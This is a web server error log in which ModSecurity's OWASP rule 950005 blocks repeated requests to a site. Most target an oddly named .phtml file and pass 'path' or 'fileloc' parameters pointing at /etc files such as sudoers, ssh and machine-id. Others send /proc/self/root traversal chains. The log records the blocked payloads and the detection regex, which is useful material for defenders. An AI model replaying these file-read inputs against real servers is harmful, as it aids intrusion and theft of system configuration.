[unique_id "ab01vta6ubjKNq_cu4bg1wAAA0g"]
[Fri Mar 20 08:55:42.515925 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.40:55124] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vhCii7xarUs8iHZyPAAAAhI"]
[Fri Mar 20 08:55:42.674674 2026] [:error] [pid 7893:tid 140411607643904] [client 57.141.18.57:55126] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vhCii7xarUs8iHZyPQAAAhA"]
[Fri Mar 20 08:55:43.155540 2026] [:error] [pid 31215:tid 140411641214720] [client 57.141.18.85:55138] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01vwF0L0L-SsrnPo5zpQAAAsw"]
[Fri Mar 20 08:55:43.203334 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.99:55140] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01v_qxLDW4GITHUkT0MAAAARY"]
[Fri Mar 20 08:55:44.081539 2026] [:error] [pid 15826:tid 140411683178240] [client 57.141.18.74:55160] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01wOoXxyEfFpUF8f-LXgAAAUc"]
[Fri Mar 20 08:55:44.116970 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.9:55162] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01wNa6ubjKNq_cu4bg2AAAA0A"]
[Fri Mar 20 08:55:44.852161 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.2:55182] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01wLninkcc-iUj5ApoSQAAA4A"]
[Fri Mar 20 08:55:45.119942 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.81:55170] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01weoXxyEfFpUF8f-LYAAAAUE"]
[Fri Mar 20 08:55:45.295403 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.64:55188] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01weoXxyEfFpUF8f-LYQAAAVY"]
[Fri Mar 20 08:55:46.048524 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.25:55206] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01wvHIg5MgXLBnicMBiQAAAdM"]
[Fri Mar 20 08:56:05.742936 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:57996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab011fXLqtnMIWvjpaKlngAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:56:08.267309 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.243.128:40134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab012F1pVZ5mVmJwsFM8ggAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:56:14.449550 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:38782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab013uoXxyEfFpUF8f-LcQAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:56:32.875938 2026] [mime_magic:error] [pid 10189:tid 140411725141760] (70014)End of file found: [client 74.7.241.31:46746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/bin
[Fri Mar 20 08:56:48.050823 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.76:57988] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02ABCii7xarUs8iHZyagAAAhQ"]
[Fri Mar 20 08:56:48.151855 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.67:57994] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02APHIg5MgXLBnicMB0gAAAcE"]
[Fri Mar 20 08:56:48.591494 2026] [:error] [pid 21219:tid 140411666392832] [client 57.141.18.16:58004] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02APXLqtnMIWvjpaKlvQAAAok"]
[Fri Mar 20 08:56:48.748554 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.111:58008] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02AOoXxyEfFpUF8f-LkwAAAUU"]
[Fri Mar 20 08:56:49.196996 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.59:58026] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02AfqxLDW4GITHUkT0ZAAAAQw"]
[Fri Mar 20 08:56:49.368612 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.68:58034] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02AfqxLDW4GITHUkT0ZQAAAQo"]
[Fri Mar 20 08:56:49.827730 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.113:58046] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02AeoXxyEfFpUF8f-LlAAAAVY"]
[Fri Mar 20 08:56:50.136863 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.63:58052] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02AhCii7xarUs8iHZybAAAAhY"]
[Fri Mar 20 08:56:50.259874 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.18:58056] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Ata6ubjKNq_cu4bg_QAAA0I"]
[Fri Mar 20 08:56:50.849551 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.80:58074] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Al1pVZ5mVmJwsFM8pAAAAFE"]
[Fri Mar 20 08:56:51.172275 2026] [:error] [pid 31215:tid 140411548894976] [client 57.141.18.28:58078] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02AwF0L0L-SsrnPo5z4QAAAtc"]
[Fri Mar 20 08:56:51.599554 2026] [:error] [pid 7235:tid 140411725141760] [client 57.141.18.15:58088] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02A_qxLDW4GITHUkT0ZgAAAQI"]
[Fri Mar 20 08:56:51.892813 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.33:58094] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02AxCii7xarUs8iHZybQAAAgo"]
[Fri Mar 20 08:56:52.117379 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.55:58098] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02BOoXxyEfFpUF8f-LlgAAAUw"]
